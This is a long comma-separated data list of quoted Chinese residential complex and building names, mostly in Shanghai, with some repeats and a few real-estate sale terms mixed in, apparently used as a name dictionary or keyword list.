"双城苑", "枫景家园", "致远大厦", "西郊名邸", "东沟新村", "金玉良苑", "世博明珠", "明珠家园", "郁庭峰", "锦绣天第", "书香门第", "新山龙", "申江豪城", "人和家园", "外滩新视界", "宏惠花苑", "爱法新都", "金海岸花园", "巨富大厦", "莘都丽景", "新珠苑", "金桥都市花园", "三岛龙州苑", "虹桥河滨花园", "绿带风光", "望景苑", "罗山花苑", "金色碧云", "南江苑", "胜康廖氏大厦", "大宁家园", "颐景山水", "华南名苑", "圣堡", "淮海中华大厦", "新理想家园", "恒大华城", "上河苑", "宝宸怡秀园", "吴淞三街坊", "东郊花园", "元一新苑", "环龙新纪园", "阳光欧洲城", "阳光国际公寓", "乾恩园", "现代律感乾清园", "东明苑", "莎海惠晨苑", "阳光巴黎", "上海领地", "南国龙苑", "南林公寓", "盛和玲珑", "原舍", "悉尼阳光", "盛族家园", "世华佳苑", "桃源清水居", "徐汇高公馆", "高欣公寓", "同济吉品", "同科公寓", "锦澳家园", "华元豪庭", "爱嘉苑", "明珠东苑", "大华水岸蓝桥", "华丽家园", "赏翠时代", "新家静品", "金色贝拉维", "新明星花园", "雍江星座", "香园", "瑞达苑", "新古北国际花园", "金鼎花苑", "绿宝园", "新芳邻", "原顾路阳光苑", "巨峰家苑", "环元苑", "阳光新居", "华丰苑", "新都花苑", "上海早晨", "凌兆大厦", "环球翡翠湾", "君临颐和花园商铺", "东泰花苑", "锦南花苑", "枫桦景苑", "百草园百乐公寓", "东渡园景别墅", "凌云公寓", "月厦新天地", "绿地大楼", "风荷云墅", "罗山新人家", "世纪左岸", "源城锦苑", "绿洲康城", "莱茵半岛苑", "万兆家园", "叠彩人家", "金都雅苑", "滨江雅苑", "中星凉城苑", "金桥湾", "南块", "城市艺术季", "广洋新景苑", "汇贤居", "古北星期八", "东上海新城", "三林城", "夏朵小城", "华银坊", "东苑利景花苑", "塞纳", "左岸", "信和花园", "昌鑫花园", "广德苑", "文化名邸", "江南苑", "阳光欧洲城", "平盛苑", "长岛别墅", "银泰花园", "国际俪晶", "太古豪庭", "明华大厦", "张杨花苑", "繁盛苑", "金水湾别墅", "远景时代", "天山平塘人家", "星辰园", "世福汇", "大宁绿湾", "宁泰馨苑", "光鸿花苑", "贝越高行馨苑", "叠翠上南", "现代星洲城", "星洲阳光", "北美精典", "夏州花园", "金象大厦", "大城小室", "香歌丽园", "未来视界", "舒城苑", "京城大厦", "弘泽阳光园", "中远两湾城", "璀璨天成", "掬水轩", "越秀苑", "凯旋豪庭", "美丽园公寓", "中星凉城西苑", "上安大厦", "清涧花苑", "湘江大厦", "虹桥阳光", "远景时代", "步高苑", "森海豪庭", "虹桥大名人", "上海万里城", "巴黎之春", "易时代", "山鑫康城", "显赫人生", "绿苑半岛", "翡翠名人府", "福海公寓", "盈港公寓", "宏润花园", "金汇五街坊", "海富花园", "赛杰苑", "东苑绿世界", "嘉和花苑", "爱莲屋", "泾南一街坊", "海森国际大厦", "淮海晶华", "君临頣和花园", "锦河苑", "金色家园", "缘锦园", "培花久远公寓", "绿泉家苑", "公园景秀", "天安嘉富丽苑", "凌兆佳苑", "丽都黄金走廊", "爱伦坡艺墅", "古北新苑", "天安花园", "虹桥领地", "星源佳苑", "中通雅苑", "由由新村", "园中苑", "苏州伯恩国际酒店", "孔雀王朝", "云间水庄", 
"明日星城世纪星", "申江远景", "宝林春天", "望族新城", "学府双星", "通德苑", "阳光公寓", "龙腾浦江", "新凤城", "银座公寓", "林与堂", "运银公寓", "中福城", "海上花", "恒阳花苑", "江南宴花园", "富华苑", "嘉华苑", "兴平昌苑", "恒升半岛国际中心", "昌鑫世纪园", "中环家园", "上海万里城", "万佳苑", "世纪时空", "新普盛公寓", "惠德公寓", "住嘉新苑", "西郊园中园", "明月花园", "同济公寓", "河滨围城", "美丽岛", "淞南九村新苑", "河畔花园城", "多摩园景", "雅士公寓", "东方花园", "景博新园", "悦景苑", "文轩苑", "南文大厦", "龙柏山庄", "住友宝莲花园", "万科假日风景", "临湖轩", "湖南大厦", "黄浦花园玫瑰湾", "静安新格公寓", "云顶别墅", "嘉德坊", "新申花城玉兰苑", "金轩大邸", "春申城都市苑", "中华苑", "康桥华庭", "东方鹿特丹", "莘华世家", "德昌公寓", "迎宾花园", "水景豪园", "蓝朝部落", "曹杨花苑", "和合苑", "新里城", "金沙嘉年华", "城市星光", "沪中新苑", "东新苑", "罗山怡景苑", "东新大厦", "全家福", "中岚大楼", "中环国际", "黄金豪园", "嘉里华庭", "世纪之门", "半岛花园", "复地香堤苑", "张江汤臣豪园", "摩登之城", "碧云新天地家园", "芳华公寓", "景谷苑", "佘山天邻别墅", "祜欣公寓", "上海知音", "汇峰鼎园", "中宁家园", "武夷花园", "曹杨华庭", "黄山始信苑", "八月桂林", "怡德苑", "美树名家", "佳源时代华苑", "维多利广场", "汤臣海景", "学森龙园", "星林苑", "澳门新苑", "嘉苑别墅", "虹桥馨苑", "上海徐家汇", "汇翠花园", "金沙江公寓", "宝地东花园", "凯悦公寓", "当代徐家汇", "海棠园景", "月亮湾", "第五大道", "东方中华园", "海欣城", "银都佳园", "榴云新村", "上海本色", "佳邸别墅", "嘉怡苑", "新城名园", "上安公馆", "通联苑", "富丽花苑", "金桥新家园", "理享家", "龙馨嘉园", "申江花苑", "梅山馨苑", "世纪凯厦", "枫桥湾名邸", "元一新苑", "嘉泰花园公寓", "漕河景苑", "月河", "好享家", "泰荣苑", "上青佳园", "界龙阳光苑", "长发花园", "颐宁苑", "富友嘉园", "紫薇阁", "申地公寓", "爱丁堡公寓", "长宏新苑", "地杰国际城", "欧洲豪庭", "韵都城", "大庭广中", "万里苑", "逸仙二村", "水岸豪苑", "牡丹园", "新逸仙公寓", "滨江龙居苑", "莲锦苑", "花语墅", "盈嘉园", "文华苑", "太湖翠峰山庄", "欧洲映象", "燕宁苑", "公园天下莘纪苑", "精武大厦", "明安馨苑", "新锦港花园", "喜福会", "美好家", "枫涧美墅", "万荣阳光苑", "流晶逸彩", "共富四村", "上海捷克住宅小区", "浦江之星", "馨虹苑", "宏裕苑", "天馨花园", "华馨苑", "爵世美墅", "湖山在望", "恬园风云汇", "天宝绿洲公寓", "灵艺大厦", "东方丽景", "伟业金锦苑", "信联公寓", "众望城", "上大聚丰园", "惠龙公寓", "中虹汇之苑", "春之声", "中星公寓", "新世纪花苑", "康德公寓", "生活新家", "绿地剑川新苑", "未名园", "公园桂冠", "金燕家苑", "七浦公寓", "绿水家园", "紫都上海晶园", "恒大华城", "东林苑", "金甸大楼", "圣特丽墅", "印象派", "嘉富丽花园", "昌里花园", "现代映象", "金纺小区", "番禺大厦", "枫桥湾名邸", "海逸半岛", "梦里水乡", "光鸿苑", "爱建新家园", "张江交江大楼", "绿邑新境", "欣晟家园", "申地公寓", "月夏香樟林", "樟馨家园", "浦江名邸", "现代星洲城", "乐业公寓", "静安凤凰苑", "春申复地城", "柏林春天", "晟业佳苑", "东宫世家", "宝通公寓", "金帝城市岸泊", "中星长岛苑", "水丰嘉园", "永和新城", "永和丽园", "明园森林都市", "临汾花园", "中皇广场", "中皇", "外滩", "东新大楼", "瑞禾明苑", "星语馨苑", "上泰雅苑", "远景时代", "天宝公寓", "南都白马花园", "绿洲尧舜公寓", "都林龙苑", "理想国爱甸苑", "幽澜苑", "上海临汾名城", "上海阳城", "长城苑", "金华阁", "宝莲府邸", "西部秀苑", "屹立家园", "三泉公寓", "夏洲花园", "松江世纪新城", "明丰文化苑", "同盛豪园", "宏城公寓", "城市新邸", "城市名园", "浩城华苑", "南花苑", "伟莱家园", "大宁公寓", "河畔雅苑", "奎江公寓", "经典花园", "曲阳住宅楼", "久阳滨江公寓", "久事西郊花园", "锦绣江南", "海高苑", "同润加洲", "欧洲豪庭", "茉莉苑", "虹瑞公寓", "蓝堡爱琴海", "创联金海花苑", "学园绿洲", "青青白洋淀恬园", "上地公寓", "亿润苑", "汇金公寓", "现代星洲城", "嘉宏紫薇园", "蓼花汀花园", "由由新邸", "申能秀庭", "恒城花苑", "馨康苑", "剑桥别墅", "东方新座滨江茗园", "桂园公寓", "御桥馨华苑", "山水苑", "盛源新苑", "新文苑", "莲泰苑", "虹桥银城", "西郊景园", "兴业公寓", "阳明花园广场", "都市花苑", "华科公寓", "太湖美山庄", "瑞嘉苑", "众源公寓", "庐迅大厦", "聚贤煌都", "平江新城", "智荟苑", "圣陶沙花园", "德阳花苑", "万科朗润园", "浣纱雅苑", "明珠福邸", "和平商厦", "丽都别墅", "西郊一品苑", "华晖绿苑", "新兴大厦公寓楼", "丝庐花语", "柏仕晶舍", "华生大厦", "宏祥花苑", "幸福小镇", "明丰绿都", "仁恒河滨花园", "虹桥中华园", "新海城", "鹏利海景公寓", "同济国康公寓", "乾龙苑", "学府家园", "永和新城", "物华园", "绿洲半岛", "恒力锦沧花园", "欧洲之星", "曹阳华庭", "万峰馨苑", "银星名庭", "涵合园", "汇佳苑", "荣丰花园", "祥和公寓", "虹桥加州风情", "明辉华庭", "星源花苑", "上海多伦多", "民达大厦", "云都新苑", "双龙汇", "昌里薪寓", "红莲大楼", "精彩华虹公寓", "上海蓝山", "恒凌公寓", "星惠佳苑", "四季绿园", "涵合园", "永兴富邦", "徐汇芳邻", "海上新月", "绿邑叠翠", "领秀府邸", "宜居", "开城新苑", "银鹿大厦", "徐汇龙庭", "大和别墅", "碧瑶花园别墅", "虹口宜家", "海源别墅", "文坊", "崇文苑", "乐扬金榜星墅", "双喜家园", "合生城邦", "星城美景", "盈翠豪景", "曲阳人家", "天峰公寓", "运杰城市花园", "外滩滨江名人苑", "富成园", "阳光欧洲", "新青浦佳园", "南馨公寓", "亚都国际名园", "海虹苑", "翠庭苑", "御华名苑", "海悦花园", "文定天下苑", "金宝大厦", "新凤凰城", "东方汇景苑", "华元公寓", "建明花苑", "仁恒河滨城", "时代绿园", "黄浦品", "蓬莱大厦", "宏业大厦", "同润加州", "北欧阳光庭园", "证大家园", "上海故事", "荣欣大厦", "首席名邸", "上大阳光", "乾宁苑", "建德南郊别墅", "南翔东海别墅", "凤六新苑", "维诗凯亚", "城市之星", "丽水华庭", "东泰大厦", "楠林水岸", "吴越天下", "中福花园", "青年汇", "锦丽斯公寓", "共康公寓", 
"大上海城市花园", "金舟苑", "虹祺花苑", "新上海一家人", "荣盛名邸", "欧风丽都", "绿洲江南园", "杰仕豪庭", "梦家园", "凯旋华庭", "璞真园", "伊莎士花园", "狮城豪庭", "逸居虹口", "逸虹景苑", "世博花园", "佳达新苑", "黄兴公寓", "中海翡翠湖岸", "新华绘", "东湖名苑", "黄浦众鑫城2期", "家公园", "台益公寓", "康河原味", "南洋博仕欣居", "西藏北麓", "仁和恬园", "长久大厦", "市光新苑", "凯润金城", "上海蓝堡", "城投世纪名城", "菊芝苑", "龙居花园", "当代高邸", "学府双星", "兰港大楼", "尚都", "世纪之春花园", "随园", "康诗丹郡", "益海公寓", "上游会舍", "景福苑", "永泉公寓", "青青白洋淀", "龙祥公寓", "路易凯旋宫", "皇朝新城", "靖宇大厦", "新城逸境园", "同济佳苑", "同领都会", "芳沁苑", "控江一村块", "建设新苑", "第九城市", "浦东虹桥花园", "上南花城", "海泰大厦", "中通大厦", "中天碧云", "馨空天地", "永业公寓", "凯兴苑", "望族新苑", "古北新城", "世纪新作", "天合大厦", "天裕小筑", "协和世界广场", "康桥水乡", "金色探戈", "正峰苑", "天合大厦", "天裕小筑", "海联苑", "虹桥蒂凡尼花园", "中科大学村", "帕萨迪纳", "虹梅家人", "泰鸿苑", "天邻英花园", "东苑古龙城", "京浦花园", "东银茗苑", "爱法小天地", "温莎别墅", "光明城市", "凯城景庭园", "东方滨港园", "瀚杨苑", "明月清泉别墅", "春岚苑", "远中风华", "浩润苑", "阳光万源公馆", "华鼎广场", "静鼎安邦府邸", "虹桥中洋公寓", "天宝绿洲", "文锦大厦", "成发苑", "晟虹新景", "联洋新苑", "安居花苑", "棕榈泉花园", "静安恬园", "和平花苑", "康隆广场", "千秋嘉苑", "复地太阳城", "嘉发大厦", "绿地南桥新苑", "徐汇金座", "静安鼎鑫家园", "天合大厦", "久阳文华府邸", "现代映象", "昌里花园", "广洋苑", "云都苑", "云润家园", "百汇中心", "独立时代", "中央富景", "银华苑", "新柳公寓", "百汇中心独立时代", "阳光星期八", "四方新城", "恒联名人世家", "景湖别墅", "君临颐和花园", "三和花园", "碧云东方公寓", "长岛公寓", "新中星华庭", "虹漕公寓", "静安兴海城", "颐峰苑", "魅力徐家汇", "帆升公寓", "东源丽晶别墅", "富容大厦", "曲阳名邸", "爱家亚洲花园", "大宁绿湾", "宁泰馨苑", "东海街园", "徐汇新湖云庭", "成亿花园", "杨浦公寓", "申银发展大厦", "淡水湾花园", "景泰嘉苑", "紫竹苑", "和一大厦", "西郊大公馆", "西郊新典别墅", "兴和苑", "幸福365", "宜川华庭", "华通大厦", "大豪山林别墅", "康琳大楼", "逸园", "锦安公寓", "新月佳苑", "文曲苑", "合虹公寓", "亭汇花苑", "梅山大楼", "沁春名邸", "宝利金", "花好月圆", "静安大闻", "丽都苑", "浪琴水岸花园", "永和新城", "阳城", "千路公寓", "兴星公寓", "老西门新苑", "名门滨江苑", "海阳明园", "日月新殿", "康健星辰", "联洋社区", "金都花好悦园", "上海映象", "阳城苑", "中科新苑", "东方丽都", "绿波花园别墅", "明华苑", "华东花苑", "古北嘉年华庭", "华元豪庭", "左岸丽景", "嘉玉龙庭", "叠加苑", "创欣南苑", "徐汇99", "双钱公寓", "中煌大厦", "太阳都市花园", "春港丽园", "胜利家园", "夏阳湖国际花园", "盛世天地", "红叶别墅", "东方曼哈顿", "美林小城", "西郊玫瑰湾", "万兆家园", "莱茵清境", "生活艺术居", "北海大厦", "华亭绿景苑", "大都会和风别墅", "世纪花园", "凯旋花苑", "怡乐花园", "静安国际花园", "世和园", "都林龙苑", "徐汇华庭", "新汇公寓", "耀江国际广场", "上海绿城百合苑", "九洲大唐花园", "科乐苑", "明申商务广场", "艺品", "黄兴", "易初生活", "金牛苑", "万豪苑", "大运盛城", "锦江", "锦馨苑", "恒海云庭", "通汇公寓", "漪园区", "月光流域", "华苑大厦", "永嘉公寓", "南郊别墅", "阳光摩天城", "同润别庄", "桂林花苑", "桂林苑", "中环明珠", "景明花园", "万源晶典", "悉尼星光", "盛族家园", "腾王阁", "中友嘉园", "紫竹华庭", "师大森呼吸", "华山香榭", "正力公寓", "龙威名邸", "紫欣公寓", "紫欣新座", "上海奥林匹克花园", "龙南平价房", "宜嘉商务楼", "逸流公寓", "贵龙园", "金苑", "利富商贸大厦", "盛源晶华", "开城公寓", "天际花园", "星云名座", "金鹰大厦", "海悦酒店式公寓", "新华世纪园", "新汾阳公寓", "嘉宝花园", "日月华庭", "莱茵半岛", "精文公寓", "同达创业大厦", "万源杰座", "豫欣公寓", "城市山林", "虹桥丽园", "绿地国际家园", "澳龙公寓", "莘梓苑", "金龙花苑", "梅花园", "海湾艺墅", "福阳大厦", "佳达新苑", "闵富大厦", "音乐河", "静安生活恋曲", "金铭", "文博水景别墅", "蓬莱家园", "居易莘庄", "团结花苑", "华商山庄", "虹漕星都", "绿雅苑", "梅陇紫藤一村", "东苑米蓝城", "金鑫怡苑", "香港新世界花园", "丹桂花园南苑", "鹿澄天地", "艺品黄兴", "科普楼", "雅典花苑", "宜居生活", "华阳公寓", "歌林春天", "仁达公寓", "安盛景园", "上海88区", "虹康花园别墅", "恒丰古北家苑", "新华公寓", "大华愉景华庭", "莲浦府邸", "时代映象", "和嘉公寓", "悦达花苑", "阳光海岸", "鑫龙苑", "龙庭秀舍", "绿泉公寓", "满庭芳花园", "全装修现房", "东方云顶", "东兰兴城", "欧风花都", "佳宁花园", "华宁小区", "盛世海岛风情酒店", "阳光加州", "国际村", "精文城市家园", "城市生活馆", "大家源虹德苑", "帕萨迪纳", "民星家园", "华祺苑", "天山新苑", "白金瀚宫", "德华苑", "共和大厦", "上海花城", "中邦风雅颂", "长堤花园别墅", "锦灏佳园", "五洲大厦", "飞洲国际广场", "正文花园", "岭南雅苑", "笠园", "凯旋坊", "高富丽源名邸", "徐汇鑫秀", "罗秀家园", "中虹丽都苑", "兴国大厦", "皇都花园", "住友昌盛新苑", "世纪景典", "花木苑", "罗马花园", "格调星洲", "百年徐汇*紫汇苑", "爱法维也纳新都", "华阳森活馆", "华阳公寓", "万科假日风景", "生活的艺术", "陆家嘴国际华城", "莘城公寓", "新华大厦", "兰桥公寓", "春满园公寓", "格林蓝天", "雅庐苑", "平武公寓", "爱丁堡", "天意洲家园", "品翠苑", "中山广场", "丽都新贵", "康宁雅庭", "绿家园", "长峰广场", "浦江大厦", "现房清盘", "翔殷心秀", "天翔苑", "华盛名门", "浦江花苑", "虹景家苑", "莱茵风尚", "万兆家园", "当代曹杨", "志豪公寓", "天诚花苑", "提香别墅", "南都韵园", "平安大厦", "常德名园", "佳信都市花园", "华融国际大厦", "民丰苑", "曲阳豪庭", "鸿申大厦", "四季茗苑", "新空间家园", "花园城", "踵嘉城", "嘉阳公寓", "金樽国际", "万兆家园", 
"莱茵枫景", "快易居", "长欣新苑", "美丽华花园", "宝纳文化源", "好世凤凰城", "星光名门", "马赛花园", "富兰克林", "新南家园", "剑桥景苑", "紫云大厦", "优族", "亲访曹安", "康馨家园", "明安绿苑", "翠庭", "四季沙龙公寓", "同方锦城", "富仕名邸", "新华名门", "紫藤居", "天赐别墅", "时代星园", "好第坊", "巴黎花园", "金榜世家文馨苑", "星俪苑", "日月新殿", "兴联大厦", "森林都市花园", "恒联新天地花园", "鑫都佳园", "维多利大厦", "巴黎时尚", "博园", "都市精品", "香榭苑", "晶钻博华苑", "徐汇秀水苑", "新梅共和城", "盛业公寓", "顺驰蓝湾", "香梅花园", "紫堤苑", "新华都商务花园", "上海公馆", "天台家园", "金斯美邸", "太和名邸", "江南名庐", "人本主邑", "桂竹香公寓", "景博花园", "东陆锦悦苑", "时代", "一天厦", "大厅广中", "万里苑", "云阳花苑", "地王中心", "虹田苑", "龙踞大厦", "齐盛世纪花园", "温莎半岛别墅", "都市水乡", "宜嘉苑", "康琳大楼", "名都城", "协和海琴花园", "泰苑", "文馨园", "金桥新城", "金石苑", "新华花苑", "虹口知心", "淞浦苑", "翡翠湾公寓", "现代华庭", "王子公寓", "彭豪公寓", "公馆", "艺术", "生活", "三盛颐景园", "仲信苑", "香榭花都", "弯弯别墅", "都市华庭", "广洋苑", "福楼望邸", "复旦书馨公寓", "珍宝公寓", "浦江茗园", "世纪梅陇镇", "东湖铭苑", "长宁馥邦", "凯旋花园", "新安公寓", "桥语别墅", "上海未来", "音乐广场", "龙柏易居", "美岸栖庭", "新华豪庭", "锦绣一方", "新华嘉利公寓", "丽水华庭", "华庭艺墅", "康泰东苑", "良辰美景", "虹桥新城", "良辰世家", "新华盟", "钻石之盟", "时代逸居", "茂名大厦", "中虹明珠苑", "海琪园", "怡泰花苑", "华业公寓", "东方广场", "上海紫园", "东方夏威夷", "振颖苑", "金色西郊城", "文化名园", "韵动时代", "易居紫荆苑", "复地美墅", "大居苑", "中城绿苑", "虹桥晶彩", "桃源兴城苑", "江南世纪新苑", "白金府邸", "朱莘苑", "金沙雅苑滨湖世家", "莘华世家", "西园", "申源苑", "天然居", "锦龙苑", "莘华世家", "南园", "春天花园酒店公寓", "九方家园", "申亚新华府", "金汇花园", "碧林湾", "晨林花苑", "邻岸东方", "南泉公寓", "东方花园", "四季运动汇", "丰盛雅苑", "书香公寓", "全家福家园", "虹梅人家", "东浩枫景苑", "明丰花园", "宏安家园", "康沁苑", "师大深呼吸", "罗阳新村", "兰馨雅苑", "艺术传家堡", "罗秀苑", "泰宸舒庭", "泰宸景苑", "明丰阳光苑", "上海银座", "嘉年城市新苑", "凯托大厦", "徐汇生活", "三泉家园", "水清苑", "莲花新村", "上海绿城", "上海诗林", "锦翠苑", "信利苑", "曹杨五月天", "阳明国际花苑", "珺乐苑", "龙柏金铃公寓", "园林天下", "银龙小区", "地铁明珠苑", "丰舍", "西郊九溪十八岛", "江南新浪", "金霄云邸", "风度国际", "东淮海公寓", "时代金领", "金桥爱建园", "四季园", "陆家嘴大人物", "仙都绿苑", "赞成", "黄兴绿园", "徐家汇花园", "虹梅佳苑", "泓园", "昌里新寓", "红莲大楼", "樟树苑", "徐汇晶典", "虹桥嘉景", "天山中华园", "龙东花园", "年平花苑", "儒园", "银晨数码大厦", "东靖苑", "华申大厦", "蒙自大楼", "富隆苑", "世外桃源花园", "张杨南苑", "东怡花苑", "博捷名苑", "漓江山水花园", "西郊家园", "金桥好人家", "静安左岸名门", "傲园", "紫藤新园", "含香馆", "聚豪天下", "云和花园", "绿地泾南公寓", "昆仑花苑", "申江名苑", "御翠园", "未来窗", "江南文化园", "达安花园", "中兴城", "宝华雅苑", "福鑫大楼", "江南造船广场", "亚太盛汇", "徐汇鑫秀", "黄浦花园", "欣宏嘉园", "千禧静安", "绿景园", "新湖明珠城", "奥玎", "宫廷", "别墅", "大同花园", "锦绣江南", "玉华东苑", "绿缘公寓", "开城新苑", "碧云国际社区晓园", "水岸茗苑", "华安苑", "柳岸人家", "东晖花苑", "智慧人家", "摩登静安", "达安锦园", "虹凉馨苑京邸翠庭", "名门世家", "名门河滨花园", "民主新苑", "景河苑", "旭日之城", "枫丹白露别墅", "共康小区", "汇康公寓", "永久城市花园", "阳光西班牙", "北华苑", "协和城", "枫林雅苑", "中星海上名庭", "幸之苑", "上海星港", "剑桥景苑", "金鼎公寓", "远景佳苑", "多摩远景", "大富苑", "剑桥景苑", "福华花苑", "锦辉绿园", "林克司别墅", "虹叶茗园", "世纪虹叶", "世茂滨江花园", "北杰公寓", "瀚林世家", "英伦花园", "准现房", "亦园", "金棕榈公寓", "经纬城市绿洲", "阳光水岸家园", "嘉富丽苑", "天馨花园八、九期", "天香公寓", "上南雅筑", "紫藤佳苑", "南江公寓", "武泰公寓", "大华水韵华庭", "感性达利", "淮海新名门", "虹林新苑", "西郊紫郡", "富丽大厦", "公园3000", "虹桥城市花园", "虹景苑", "湖畔佳苑", "咏蝶苑", "和兰苑", "住友嘉馨名园", "中央花园", "亨纳斯花园", "和馨苑", "长发虹桥公寓", "文涛阁", "和平公园泰成花苑", "雍景园", "汇园小区", "欧阳名邸", "恒益公寓", "法华门大厦", "汇佳新苑", "家骏花苑3期", "彭浦家园", "理想国爱甸苑", "立雪苑", "欢天喜地", "锦绣苑", "仙霞首府", "虹桥新天地", "国际丽都城", "复兴佳苑", "绿康公寓", "当代成品峥宸苑", "古北中央花园", "晶品汇", "国鑫大厦", "北美田园", "半岛水花园", "翠堤春晓", "春意苑", "申地苑", "汇成宾阳苑", "虹口龙庭", "永巍公寓", "国亭花苑", "爱迪公寓", "上海国际华城", "畅园", "冠生园", "东方佳苑", "南洋新都", "西部名邸", "宝安新苑", "枫逸人家", "乔爱别墅", "郁庭峰", "大华水韵华庭", "华翔公寓", "丽都康城", "陆家嘴新景园", "意和家园", "悠诗阁", "星阳苑", "锦绣阁", "纯翠上南", "淮海新公馆", "强生古北花园", "御墅临枫", "顺意苑", "嘉园", "黄兴广场", "尊园", "天马花苑", "海誓山盟", "亚成公寓", "静安华府", "宝地绿洲城", "上海映象", "汤臣高尔夫别墅", "福安大厦", "东苑利华", "奥塞花园", "国际金融家", "阳光爱琴海", "文化花园", "金港花园", "创智年代", "金淙苑家源", "陆家嘴生活中心", "上大阳光", "乾泽园", "汇京佳丽园", "中星云庭", "西郊龙柏香榭苑", "瑞南新苑", "高峰汇", "紫晶南园", "美树铭家", "锦华花园水景苑", "三湘世纪花城", "芝梅苑住宅", "上海壹街区", "平阳绿家园", "天伦家园", "陆家嘴中央公寓", "长阳新贵", "旺增公寓", "恒大华城", "天地苑", "飘鹰花苑", "头桥大宅小区", "安基明珠", "实华公寓", "黄浦新苑", "景庭", "古北佘山国际别墅", "日月新苑", "宏润公寓", "汇丰佳苑", "虹口典范", "连城", 
"香榭丽花园", "康华苑", "银涛高尔夫别墅", "华能城市花园", "新泽西庄园", "森林湾", "樱缘花园", "金桥丽景", "凯鑫苑", "延安嘉苑", "和达家园", "中虹花园", "锦秀文华", "安基明珠", "实华公寓", "满庭香半岛", "瑞金福地", "福华花苑", "太阳湖大花园", "白玉兰家园", "徐汇兆嘉园", "奥克苑", "菱翔苑", "海通花苑", "南虹公寓", "绿洲苑", "屹立家园", "知音艺园", "龙昌苑", "明园世纪城", "科汇景苑", "云都公寓", "卢湾都市花园", "新亚徐汇公寓", "檀宫", "幸福苑", "西部俊园", "君怡公寓", "御品大厦", "山水世纪", "九歌花园", "挹翠名门", "林顿大厦", "世茂湖滨花园", "现代律感", "乾清苑", "中恒苑", "泰晤士小镇", "珠江香樟园", "汇龙新城", "海斯大厦", "阳光苑极景易家", "棕榈滩别墅", "黄金海岸", "长宁盛居", "上海领秀爱建园", "沔溪苑", "虹祥福邸", "乾弘佳园", "新静安都市", "长春新苑", "陶园", "南花园和中华苑", "香港丽园", "锦蝶苑", "古北国际花园", "徐汇龙兆苑", "万科华尔兹花园", "新地大厦", "壹间房", "张江国际酒店公寓", "飘鹰东方花园", "新天家园", "淞园小区", "美丽星城", "徐家汇景福苑", "静城公寓", "永厦大楼", "上海人家", "地方天园", "环龙公寓", "莘城苑", "望江苑", "协通公寓", "柳明公寓", "清悠时代", "新虹桥风情", "广虹馨苑", "新地苑", "皇宫半岛别墅", "西渡指挥部", "东方太古花园", "南吉公寓", "凯欣豪园", "长阳新贵", "旺增公寓", "东方城市花园", "兴林公寓", "嘉丰佳苑", "经典花园", "兰村大厦", "中华大街", "东业大厦", "欧香名邸", "西渡指挥部", "雅园", "惠达大厦", "生茂养园", "奉浦苑", "上海五月天", "贵都万体景苑", "申升公寓", "汇丽苑", "金坤服务公寓", "世纪海岸广场", "长丰公寓", "金色航城", "徐家汇景园", "九九园", "佳日公寓", "世袭愚园", "方圆公寓", "秋水云庐", "华唐苑", "宝地新品居", "万兆家园", "莱茵春舍", "华佳花园", "古北新城", "新月丽苑", "中凯城市之光", "振宏公寓", "颛溪新苑", "宝莲湖景园", "静安顺德苑", "文化佳园", "上海莘城", "牡丹阁", "博鸿大厦", "新外滩花苑", "上海莘城", "华银府邸", "浦江天第苑", "塞纳左岸", "达安花园", "静安景观豪庭", "香树丽舍", "丰华家园", "美邻苑", "泰兴广场", "安宁欧洲花园", "徐汇自由度", "居礼", "上海之窗", "御景园", "水仙苑", "中京苑", "思南新苑", "上海康城", "海湾豪宅", "春申景城", "金水湾贵园", "君怡公寓", "幽兰雅筑", "金桥一方", "雅苑", "水岸家苑", "法华门大厦", "平吉世纪家园", "新城枫景", "东方苏荷", "金宇别墅", "虹桥金斯花园", "御风国际", "美晶佳园", "泰古公寓", "恒安大厦", "万升家园", "锦秋花园", "紫荆苑", "上海豪园", "河滨豪园", "新翔公寓", "贵仁绿苑", "阳光新天地", "万都花园", "成亿家园", "城市丽园", "小富人家", "亦园", "福泰公寓", "紫罗兰家苑", "东方名城", "宜仕怡家", "恒力苑", "嘉城", "翰林苑", "财智时代", "扬波大厦", "飘鹰花园", "中星海上华庭", "润和苑", "凯鹏大厦", "长城花园", "金华苑", "森都公寓", "洪远公寓", "好世樱园", "易居东城", "中海", "叠翠别墅", "古北家苑", "华光花园", "美丽园大酒店", "嘉美美家", "华舟大厦", "中海馨园", "领秀丽墅", "华亭雅居", "金水湾", "贵园", "鑫安公寓", "明丰佳园", "安基大厦", "新世纪名苑", "城品人家", "三泉家园", "虹桥金俊苑", "森南大厦", "长寿商业广场", "城市桂冠", "元福大厦", "现代康桥", "百舸馨苑", "真情家公园", "真情公寓", "锦沧公寓", "西班牙名园", "欧罗巴生活", "今天花园", "屹立公寓", "鑫国家园", "圣马丽诺桥", "华夏金桂苑", "北美公寓", "北美枫情", "飞旺家园", "复地雅园", "中海", "叠翠别墅", "上环公寓", "东方雅苑", "海上海新城", "住宅", "墅邻花苑", "幸福第二公寓", "绿地西郊别墅", "上海滩花园洋房", "锦凯华苑", "广盛公寓", "虹光公寓", "华城秀庭", "天外翠湖", "君安乡村别墅", "绿带风光", "源景苑", "阳光绿园", "天虹苑", "虹康景博苑", "共富新村", "国地公寓", "碧云108", "金桥酒店公寓", "传人雅居", "新竹小区", "优诗美地", "博园", "家化滨江苑", "罗溪花苑", "阳光名邸", "丽都成品", "嘉骏花苑", "玲珑碧寓", "临江三村", "云峰苑", "晶彩加拿大", "金衡公寓", "耀江花园", "杨泰苑", "创世纪花园", "纽约座", "安信·湖畔天地坊", "安丰小区", "同泰公寓", "福赐新苑", "汤臣豪庭美丽空间", "名盛苑", "富锦苑", "东珂花苑", "创世纪河滨花园", "高境欣苑", "梦蝶苑", "虹领公寓", "高境苑", "牡丹锦苑", "龙柏西郊公寓", "水岸名邸", "海昌苑", "璟都新园", "兆丰虹桥公寓", "浩润大厦", "虹口情缘", "宇泰景苑", "锦秋加州花园", "东方剑桥", "玉佛城", "岭南苑", "宝启花园", "梅陇城", "望族苑", "沈默荷兰园", "虹康景博苑", "伟达盛宅花园", "巴洛克宫廷", "紫东新苑", "博爱家园", "景园", "乾心花园", "东兰兴城玉兰苑", "意凯花苑", "鸿力公寓", "大唐花园", "金竹园", "海德名园", "罗马花园", "天极盛宅花园", "徐汇一品苑", "阳光世纪城", "南部阳光翠庭", "青年汇", "好旺苑", "新明星花园", "海博大厦", "滨江雅墅", "临潼苑", "大华公园", "西郊华城", "石涛园", "天安别墅", "东方日出苑", "意和家园", "今达花园", "九九别墅", "非常地中海", "申德公寓", "润欣公寓", "虹锦佳话", "正南花苑", "赢家时代", "豪门府邸", "红叶东苑", "太阳别墅", "知雅汇", "志成花苑", "绿洲长岛花园", "开隆公寓", "丽华公寓", "金色枫情", "金枫豪苑", "东方金门花园", 